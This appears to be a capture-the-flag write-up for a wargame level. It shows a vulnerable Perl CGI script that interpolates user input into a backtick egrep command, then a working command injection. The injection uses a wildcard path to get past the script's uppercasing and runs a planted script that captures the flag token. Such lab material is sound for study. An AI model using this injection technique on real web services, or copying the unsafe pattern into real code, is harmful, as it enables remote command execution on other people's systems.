> ls
level12.pl

> cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));


> mkdir /tmp/TEST/

> vim /tmp/TEST/EXPLOIT
`getflag > /tmp/TEST/out`

> chmod 777 /tmp/TEST/

> chmod 777 /tmp/TEST/EXPLOIT

go to http://192.168.1.235:4646/level12.pl?x=%22`/*/TEST/EXPLOIT`%22

> ls /tmp/TEST
EXPLOIT  out

> cat /tmp/TEST/out
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
